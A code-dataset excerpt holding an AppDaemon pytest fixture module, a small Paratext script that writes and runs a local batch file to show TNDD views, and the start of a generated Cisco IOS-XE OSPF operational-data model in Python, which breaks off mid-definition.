ensure_automation_is_valid(automation) def __call__(self, function): @pytest.fixture(params=self.automation_classes, ids=self._generate_id) def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks): automation_class = request.param return _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks) return 
automation_fixture_with_initialisation def _generate_id(self, automation_classes): return automation_classes.__name__ class _AutomationFixtureDecoratorWithArgs: def __init__(self, automation_classes_with_args): self.automation_classes_with_args = automation_classes_with_args for automation, _args in self.automation_classes_with_args: ensure_automation_is_valid(automation) def __call__(self, function): @pytest.fixture(params=self.automation_classes_with_args, ids=self._generate_id) def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks): automation_class = request.param[0] automation_args = request.param[1] automation = _instantiate_and_initialize_automation( function, automation_class, given_that, hass_functions, hass_mocks) return (automation, automation_args) return automation_fixture_with_initialisation def _generate_id(self, automation_classes_with_args): return automation_classes_with_args[0].__name__ def automation_fixture(*args): """ Decorator to seamlessly initialize and inject an automation fixture 4 Versions: - Single Class: @automation_fixture(MyAutomation) - Multiple Classes: @automation_fixture(MyAutomation, MyOtherAutomation) - Single Class w/ params: @automation_fixture((upstairs.Bedroom, {'motion': 'binary_sensor.bedroom_motion'})) - Multiple Classes w/ params: @automation_fixture( (upstairs.Bedroom, {'motion': 'binary_sensor.bedroom_motion'}), (upstairs.Bathroom, {'motion': 'binary_sensor.bathroom_motion'}), ) When multiple classes are passed, tests will be generated for each automation. 
When using parameters, the injected object will be a tuple: `(Initialized_Automation, params)` # Pre-initialization setup All code in the `@automation_fixture` function will be executed before initializing the `automation_class` 3 fixtures are injectable in `@automation_fixture`: 'given_that', 'hass_mocks' and 'hass_functions' 'hass_functions' is deprecated in favor of 'hass_mocks' Examples: ```python @automation_fixture(Bathroom) def bathroom(): pass # -> `Bathroom` automation will be initialized and available in tests as `bathroom` --- @automation_fixture(Bathroom) def bathroom(given_that): given_that.time_is(time(hour=13)) # -> 1. `given_that.time_is(time(hour=13))` will be called # -> 2. `Bathroom` automation will be initialized and available in tests as `bathroom` ``` Do not return anything, any returned object will be ignored """ if not args or isfunction(args[0]): raise AutomationFixtureError( 'Do not forget to pass the automation class(es) as argument') if type(args[0]) is not tuple: automation_classes = args return _AutomationFixtureDecoratorWithoutArgs(automation_classes) else: automation_classes_with_args = args return _AutomationFixtureDecoratorWithArgs(automation_classes_with_args)
38.844444
149
0.707809
import warnings from inspect import isfunction, signature import pkg_resources import pytest from appdaemon.plugins.hass.hassapi import Hass from appdaemontestframework.common import AppdaemonTestFrameworkError class AutomationFixtureError(AppdaemonTestFrameworkError): pass def _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks): _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks) automation = automation_class( None, automation_class.__name__, None, None, None, None, None ) automation.initialize() given_that.mock_functions_are_cleared() return automation def _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks): injectable_fixtures = { 'given_that': given_that, 'hass_functions': hass_functions, 'hass_mocks': hass_mocks, } def _check_valid(param): if param not in injectable_fixtures: raise AutomationFixtureError( f"'{param}' is not a valid fixture! | The only fixtures injectable in '@automation_fixture' are: {list(injectable_fixtures.keys())}") if param == 'hass_functions': warnings.warn( """ Injecting `hass_functions` into automation fixtures is deprecated. 
Replace `hass_functions` with `hass_mocks` injections and access hass_functions with `hass_mocks.hass_functions` """, DeprecationWarning) args = [] for param in signature(function).parameters: _check_valid(param) args.append(injectable_fixtures.get(param)) function(*tuple(args)) def ensure_automation_is_valid(automation_class): def function_exist_in_automation_class(func_name): return func_name in dir(automation_class) def function_has_arguments_other_than_self(func_name): func_parameters = signature(getattr(automation_class, func_name)).parameters return list(func_parameters.keys()) != ["self"] def __init___was_overridden(): return '__init__' in automation_class.__dict__ def not_subclass_of_Hass(): return not issubclass(automation_class, Hass) if not function_exist_in_automation_class('initialize'): raise AutomationFixtureError( f"'{automation_class.__name__}' has no 'initialize' function! Make sure you implemented it!") if function_has_arguments_other_than_self('initialize'): raise AutomationFixtureError( f"'{automation_class.__name__}' 'initialize' should have no arguments other than 'self'!") if __init___was_overridden(): raise AutomationFixtureError(f"'{automation_class.__name__}' should not override '__init__'") if not_subclass_of_Hass(): raise AutomationFixtureError(f"'{automation_class.__name__}' should be a subclass of 'Hass'") class _AutomationFixtureDecoratorWithoutArgs: def __init__(self, automation_classes): self.automation_classes = automation_classes for automation in self.automation_classes: ensure_automation_is_valid(automation) def __call__(self, function): @pytest.fixture(params=self.automation_classes, ids=self._generate_id) def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks): automation_class = request.param return _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks) return automation_fixture_with_initialisation def _generate_id(self, 
automation_classes): return automation_classes.__name__ class _AutomationFixtureDecoratorWithArgs: def __init__(self, automation_classes_with_args): self.automation_classes_with_args = automation_classes_with_args for automation, _args in self.automation_classes_with_args: ensure_automation_is_valid(automation) def __call__(self, function): @pytest.fixture(params=self.automation_classes_with_args, ids=self._generate_id) def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks): automation_class = request.param[0] automation_args = request.param[1] automation = _instantiate_and_initialize_automation( function, automation_class, given_that, hass_functions, hass_mocks) return (automation, automation_args) return automation_fixture_with_initialisation def _generate_id(self, automation_classes_with_args): return automation_classes_with_args[0].__name__ def automation_fixture(*args): if not args or isfunction(args[0]): raise AutomationFixtureError( 'Do not forget to pass the automation class(es) as argument') if type(args[0]) is not tuple: automation_classes = args return _AutomationFixtureDecoratorWithoutArgs(automation_classes) else: automation_classes_with_args = args return _AutomationFixtureDecoratorWithArgs(automation_classes_with_args)
true
true
f705aa88a1c1f1199101a25efeea9d789667e79f
587
py
Python
TNDD/cms/TNDD_Views_show.py
sillsdev/PT-Views
e6587aa14553b12e40b52ec53418868b0d9e0895
[ "MIT" ]
null
null
null
TNDD/cms/TNDD_Views_show.py
sillsdev/PT-Views
e6587aa14553b12e40b52ec53418868b0d9e0895
[ "MIT" ]
null
null
null
TNDD/cms/TNDD_Views_show.py
sillsdev/PT-Views
e6587aa14553b12e40b52ec53418868b0d9e0895
[ "MIT" ]
null
null
null
# Show TNDD Views for Paratext # Written by Ian McQuay, SIL International, 2022-01-05+10:00 # Import OS to be able to output correctly to Windows import os # Define batch files actionbatchfile = "C:\Users\Public\PT-Views\user-views-action.cmd" batchfile = "C:\Users\Public\PT-Views\user-views-manager.cmd" # setup variables for the ACTION batch file. commandstring = "echo set action=show> " + actionbatchfile os.system(commandstring) commandstring = "echo set matchstart=TNDD>> " + actionbatchfile os.system(commandstring) # Run the batch file to do the action os.startfile(batchfile)
36.6875
66
0.773424
import os actionbatchfile = "C:\Users\Public\PT-Views\user-views-action.cmd" batchfile = "C:\Users\Public\PT-Views\user-views-manager.cmd" commandstring = "echo set action=show> " + actionbatchfile os.system(commandstring) commandstring = "echo set matchstart=TNDD>> " + actionbatchfile os.system(commandstring) os.startfile(batchfile)
false
true
f705aabf435e5694deac5786cce3a35968d77640
805,471
py
Python
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
CiscoDevNet/ydk-py
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
[ "ECL-2.0", "Apache-2.0" ]
177
2016-03-15T17:03:51.000Z
2022-03-18T16:48:44.000Z
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
CiscoDevNet/ydk-py
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
[ "ECL-2.0", "Apache-2.0" ]
18
2016-03-30T10:45:22.000Z
2020-07-14T16:28:13.000Z
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
CiscoDevNet/ydk-py
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
[ "ECL-2.0", "Apache-2.0" ]
85
2016-03-16T20:38:57.000Z
2022-02-22T04:26:02.000Z
""" Cisco_IOS_XE_ospf_oper This module contains a collection of YANG definitions for monitoring the operation of ospf protocol in a Network Element. Copyright (c) 2016\-2018 by Cisco Systems, Inc. All rights reserved. """ from collections import OrderedDict from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64 from ydk.filters import YFilter from ydk.errors import YError, YModelError from ydk.errors.error_handler import handle_type_error as _handle_type_error class AddressFamily(Enum): """ AddressFamily (Enum Class) Address family type .. data:: address_family_ipv4 = 0 .. data:: address_family_ipv6 = 1 """ address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4") address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6") class NbrStateType(Enum): """ NbrStateType (Enum Class) OSPF neighbor state type .. data:: ospf_nbr_down = 1 Neighbor state down .. data:: ospf_nbr_attempt = 2 Neighbor attempt state .. data:: ospf_nbr_init = 3 Neighbor init state .. data:: ospf_nbr_two_way = 4 Neighbor 2-way state .. data:: ospf_nbr_exchange_start = 5 Neighbor exchange start state .. data:: ospf_nbr_exchange = 6 Neighbor exchange state .. data:: ospf_nbr_loading = 7 Neighbor loading state .. data:: ospf_nbr_full = 8 Neighbor full state """ ospf_nbr_down = Enum.YLeaf(1, "ospf-nbr-down") ospf_nbr_attempt = Enum.YLeaf(2, "ospf-nbr-attempt") ospf_nbr_init = Enum.YLeaf(3, "ospf-nbr-init") ospf_nbr_two_way = Enum.YLeaf(4, "ospf-nbr-two-way") ospf_nbr_exchange_start = Enum.YLeaf(5, "ospf-nbr-exchange-start") ospf_nbr_exchange = Enum.YLeaf(6, "ospf-nbr-exchange") ospf_nbr_loading = Enum.YLeaf(7, "ospf-nbr-loading") ospf_nbr_full = Enum.YLeaf(8, "ospf-nbr-full") class OspfAuthType(Enum): """ OspfAuthType (Enum Class) OSPF Authentication type .. data:: ospf_auth_ipsec = 0 .. data:: ospf_auth_trailer_keychain = 1 .. data:: ospf_auth_trailer_key = 2 .. 
data:: ospf_auth_type_none = 3 """ ospf_auth_ipsec = Enum.YLeaf(0, "ospf-auth-ipsec") ospf_auth_trailer_keychain = Enum.YLeaf(1, "ospf-auth-trailer-keychain") ospf_auth_trailer_key = Enum.YLeaf(2, "ospf-auth-trailer-key") ospf_auth_type_none = Enum.YLeaf(3, "ospf-auth-type-none") class OspfExternalMetricType(Enum): """ OspfExternalMetricType (Enum Class) External metric type .. data:: ospf_ext_metric_type_1 = 0 .. data:: ospf_ext_metric_type_2 = 1 """ ospf_ext_metric_type_1 = Enum.YLeaf(0, "ospf-ext-metric-type-1") ospf_ext_metric_type_2 = Enum.YLeaf(1, "ospf-ext-metric-type-2") class OspfNetworkType(Enum): """ OspfNetworkType (Enum Class) OSPF network type .. data:: ospf_broadcast = 0 OSPF broadcast multi-access network .. data:: ospf_non_broadcast = 1 OSPF Non-Broadcast Multi-Access (NBMA) network .. data:: ospf_point_to_multipoint = 2 OSPF point-to-multipoint network .. data:: ospf_point_to_point = 3 OSPF point-to-point network """ ospf_broadcast = Enum.YLeaf(0, "ospf-broadcast") ospf_non_broadcast = Enum.YLeaf(1, "ospf-non-broadcast") ospf_point_to_multipoint = Enum.YLeaf(2, "ospf-point-to-multipoint") ospf_point_to_point = Enum.YLeaf(3, "ospf-point-to-point") class OspfOperationMode(Enum): """ OspfOperationMode (Enum Class) OSPF operational mode .. data:: ospf_ships_in_the_night = 0 Ships-in-the-night operation mode in which each OSPF instance carries only one address family """ ospf_ships_in_the_night = Enum.YLeaf(0, "ospf-ships-in-the-night") class Ospfv2AuthTypeSelection(Enum): """ Ospfv2AuthTypeSelection (Enum Class) The authentication type .. data:: ospfv2_auth_none = 0 No authentication configured .. data:: ospfv2_auth_trailer_key = 1 Authentication uses the trailer key .. 
data:: ospfv2_auth_trailer_key_chain = 2 Authentication uses a trailer key chain """ ospfv2_auth_none = Enum.YLeaf(0, "ospfv2-auth-none") ospfv2_auth_trailer_key = Enum.YLeaf(1, "ospfv2-auth-trailer-key") ospfv2_auth_trailer_key_chain = Enum.YLeaf(2, "ospfv2-auth-trailer-key-chain") class Ospfv2CryptoAlgorithm(Enum): """ Ospfv2CryptoAlgorithm (Enum Class) The algorithm in use .. data:: ospfv2_crypto_cleartest = 0 The OSPFv2 authentication is sent as cleartext .. data:: ospfv2_crypto_md5 = 1 The OSPFv2 authentication is encrypted using Message Digest 5 """ ospfv2_crypto_cleartest = Enum.YLeaf(0, "ospfv2-crypto-cleartest") ospfv2_crypto_md5 = Enum.YLeaf(1, "ospfv2-crypto-md5") class Ospfv2IntfState(Enum): """ Ospfv2IntfState (Enum Class) The possible states that an interface can be in .. data:: ospfv2_interface_state_down = 0 The interface is in the down state .. data:: ospfv2_interface_state_loopback = 1 The interface is in loopback state .. data:: ospfv2_interface_state_waiting = 2 The interface is in waiting state .. data:: ospfv2_interface_state_point_to_mpoint = 3 The interface is in point-to-multipoint state .. data:: ospfv2_interface_state_point_to_point = 4 The interface is in point-to-point state .. data:: ospfv2_interface_state_dr = 5 The interface is in the designated router state .. data:: ospfv2_interface_state_backup = 6 The interface is providing backup for another interface .. 
data:: ospfv2_interface_state_other = 7 The interface is in a state other than the ones nummerated in this list """ ospfv2_interface_state_down = Enum.YLeaf(0, "ospfv2-interface-state-down") ospfv2_interface_state_loopback = Enum.YLeaf(1, "ospfv2-interface-state-loopback") ospfv2_interface_state_waiting = Enum.YLeaf(2, "ospfv2-interface-state-waiting") ospfv2_interface_state_point_to_mpoint = Enum.YLeaf(3, "ospfv2-interface-state-point-to-mpoint") ospfv2_interface_state_point_to_point = Enum.YLeaf(4, "ospfv2-interface-state-point-to-point") ospfv2_interface_state_dr = Enum.YLeaf(5, "ospfv2-interface-state-dr") ospfv2_interface_state_backup = Enum.YLeaf(6, "ospfv2-interface-state-backup") ospfv2_interface_state_other = Enum.YLeaf(7, "ospfv2-interface-state-other") class Ospfv2LsaType(Enum): """ Ospfv2LsaType (Enum Class) Link State Advertisement type .. data:: ospfv2_lsa_type_unsupported_lsa_type = 0 .. data:: ospfv2_lsa_type_router = 1 .. data:: ospfv2_lsa_type_network = 2 .. data:: ospfv2_lsa_type_summary_net = 3 .. data:: ospfv2_lsa_type_summary_router = 4 .. data:: ospfv2_lsa_type_as_external = 5 .. data:: ospfv2_lsa_type_nssa = 6 .. data:: ospfv2_lsa_type_link_scope_opaque = 7 .. data:: ospfv2_lsa_type_area_scope_opaque = 8 .. 
data:: ospfv2_lsa_type_as_scope_opaque = 9 """ ospfv2_lsa_type_unsupported_lsa_type = Enum.YLeaf(0, "ospfv2-lsa-type-unsupported-lsa-type") ospfv2_lsa_type_router = Enum.YLeaf(1, "ospfv2-lsa-type-router") ospfv2_lsa_type_network = Enum.YLeaf(2, "ospfv2-lsa-type-network") ospfv2_lsa_type_summary_net = Enum.YLeaf(3, "ospfv2-lsa-type-summary-net") ospfv2_lsa_type_summary_router = Enum.YLeaf(4, "ospfv2-lsa-type-summary-router") ospfv2_lsa_type_as_external = Enum.YLeaf(5, "ospfv2-lsa-type-as-external") ospfv2_lsa_type_nssa = Enum.YLeaf(6, "ospfv2-lsa-type-nssa") ospfv2_lsa_type_link_scope_opaque = Enum.YLeaf(7, "ospfv2-lsa-type-link-scope-opaque") ospfv2_lsa_type_area_scope_opaque = Enum.YLeaf(8, "ospfv2-lsa-type-area-scope-opaque") ospfv2_lsa_type_as_scope_opaque = Enum.YLeaf(9, "ospfv2-lsa-type-as-scope-opaque") class OspfOperData(Entity): """ Operational state of ospf .. attribute:: ospf_state OSPF operational state **type**\: :py:class:`OspfState <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState>` **presence node**\: True **config**\: False .. 
attribute:: ospfv2_instance The OSPF instance **type**\: list of :py:class:`Ospfv2Instance <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData, self).__init__() self._top_entity = None self.yang_name = "ospf-oper-data" self.yang_parent_name = "Cisco-IOS-XE-ospf-oper" self.is_top_level_class = True self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("ospf-state", ("ospf_state", OspfOperData.OspfState)), ("ospfv2-instance", ("ospfv2_instance", OspfOperData.Ospfv2Instance))]) self._leafs = OrderedDict() self.ospf_state = None self._children_name_map["ospf_state"] = "ospf-state" self.ospfv2_instance = YList(self) self._segment_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData, [], name, value) class OspfState(Entity): """ OSPF operational state .. attribute:: op_mode OSPF operation mode **type**\: :py:class:`OspfOperationMode <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperationMode>` **config**\: False .. 
attribute:: ospf_instance OSPF routing protocol instance **type**\: list of :py:class:`OspfInstance <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance>` **config**\: False This class is a :ref:`presence class<presence-class>` """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState, self).__init__() self.yang_name = "ospf-state" self.yang_parent_name = "ospf-oper-data" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("ospf-instance", ("ospf_instance", OspfOperData.OspfState.OspfInstance))]) self.is_presence_container = True self._leafs = OrderedDict([ ('op_mode', (YLeaf(YType.enumeration, 'op-mode'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfOperationMode', '')])), ]) self.op_mode = None self.ospf_instance = YList(self) self._segment_path = lambda: "ospf-state" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState, ['op_mode'], name, value) class OspfInstance(Entity): """ OSPF routing protocol instance .. attribute:: af (key) Address\-family of the instance **type**\: :py:class:`AddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.AddressFamily>` **config**\: False .. attribute:: router_id (key) Defined in RFC 2328. A 32\-bit number that uniquely identifies the router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospf_area List of ospf areas **type**\: list of :py:class:`OspfArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea>` **config**\: False .. attribute:: link_scope_lsas List OSPF link scope LSA **type**\: list of :py:class:`LinkScopeLsas <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas>` **config**\: False .. 
attribute:: multi_topology OSPF multi\-topology interface augmentation **type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.MultiTopology>` **config**\: False .. attribute:: process_id The process identifier used to refer to this instance **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance, self).__init__() self.yang_name = "ospf-instance" self.yang_parent_name = "ospf-state" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['af','router_id'] self._child_classes = OrderedDict([("ospf-area", ("ospf_area", OspfOperData.OspfState.OspfInstance.OspfArea)), ("link-scope-lsas", ("link_scope_lsas", OspfOperData.OspfState.OspfInstance.LinkScopeLsas)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.MultiTopology))]) self._leafs = OrderedDict([ ('af', (YLeaf(YType.enumeration, 'af'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'AddressFamily', '')])), ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])), ('process_id', (YLeaf(YType.uint16, 'process-id'), ['int'])), ]) self.af = None self.router_id = None self.process_id = None self.ospf_area = YList(self) self.link_scope_lsas = YList(self) self.multi_topology = YList(self) self._segment_path = lambda: "ospf-instance" + "[af='" + str(self.af) + "']" + "[router-id='" + str(self.router_id) + "']" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/ospf-state/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance, ['af', 'router_id', 'process_id'], name, value) class OspfArea(Entity): """ List of ospf areas .. attribute:: area_id (key) OSPF area ID **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: ospf_interface List of OSPF interfaces **type**\: list of :py:class:`OspfInterface <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface>` **config**\: False .. attribute:: area_scope_lsa List of OSPF area scope LSA **type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea, self).__init__() self.yang_name = "ospf-area" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['area_id'] self._child_classes = OrderedDict([("ospf-interface", ("ospf_interface", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa))]) self._leafs = OrderedDict([ ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])), ]) self.area_id = None self.ospf_interface = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "ospf-area" + "[area-id='" + str(self.area_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea, ['area_id'], name, value) class OspfInterface(Entity): """ List of OSPF interfaces .. attribute:: name (key) Interface name **type**\: str **config**\: False .. attribute:: network_type Network type **type**\: :py:class:`OspfNetworkType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfNetworkType>` **config**\: False .. attribute:: passive Enable/Disable passive **type**\: bool **config**\: False .. attribute:: demand_circuit Enable/Disable demand circuit **type**\: bool **config**\: False .. 
attribute:: multi_area Multi Area **type**\: :py:class:`MultiArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea>` **config**\: False .. attribute:: static_neighbor Staticly configured neighbors **type**\: list of :py:class:`StaticNeighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor>` **config**\: False .. attribute:: node_flag Set prefix as a node representative prefix **type**\: bool **config**\: False .. attribute:: fast_reroute Fast reroute config **type**\: :py:class:`FastReroute <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute>` **config**\: False .. attribute:: cost Interface cost **type**\: int **range:** 0..65535 **config**\: False .. attribute:: hello_interval Time between hello packets **type**\: int **range:** 0..65535 **config**\: False .. attribute:: dead_interval Interval after which a neighbor is declared dead **type**\: int **range:** 0..65535 **config**\: False .. attribute:: retransmit_interval Time between retransmitting unacknowledged Link State Advertisements (LSAs) **type**\: int **range:** 0..65535 **config**\: False .. attribute:: transmit_delay Estimated time needed to send link\-state update **type**\: int **range:** 0..65535 **config**\: False .. attribute:: mtu_ignore Enable/Disable ignoring of MTU in DBD packets **type**\: bool **config**\: False .. attribute:: lls Enable/Disable link\-local signaling (LLS) support **type**\: bool **config**\: False .. attribute:: prefix_suppression Suppress advertisement of the prefixes **type**\: bool **config**\: False .. attribute:: bfd Enable/disable bfd **type**\: bool **config**\: False .. 
attribute:: ttl_security TTL security **type**\: :py:class:`TtlSecurity <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity>` **config**\: False .. attribute:: enable Enable/disable protocol on the interface **type**\: bool **config**\: False .. attribute:: authentication Authentication configuration **type**\: :py:class:`Authentication <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication>` **config**\: False .. attribute:: state Interface state **type**\: str **config**\: False .. attribute:: hello_timer Hello timer **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: wait_timer Wait timer **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: dr Designated Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: bdr Backup Designated Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: ospf_neighbor List of OSPF neighbors **type**\: list of :py:class:`OspfNeighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor>` **config**\: False .. attribute:: intf_link_scope_lsas List OSPF link scope LSAs **type**\: list of :py:class:`IntfLinkScopeLsas <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas>` **config**\: False .. attribute:: intf_multi_topology OSPF interface topology **type**\: list of :py:class:`IntfMultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology>` **config**\: False .. attribute:: priority Configure OSPF router priority **type**\: int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, self).__init__() self.yang_name = "ospf-interface" self.yang_parent_name = "ospf-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([("multi-area", ("multi_area", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea)), ("static-neighbor", ("static_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor)), ("fast-reroute", ("fast_reroute", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute)), ("ttl-security", ("ttl_security", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity)), ("authentication", ("authentication", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication)), ("ospf-neighbor", ("ospf_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor)), ("intf-link-scope-lsas", ("intf_link_scope_lsas", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas)), 
("intf-multi-topology", ("intf_multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology))]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])), ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])), ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])), ('node_flag', (YLeaf(YType.boolean, 'node-flag'), ['bool'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])), ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])), ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])), ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])), ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])), ('lls', (YLeaf(YType.boolean, 'lls'), ['bool'])), ('prefix_suppression', (YLeaf(YType.boolean, 'prefix-suppression'), ['bool'])), ('bfd', (YLeaf(YType.boolean, 'bfd'), ['bool'])), ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('state', (YLeaf(YType.str, 'state'), ['str'])), ('hello_timer', 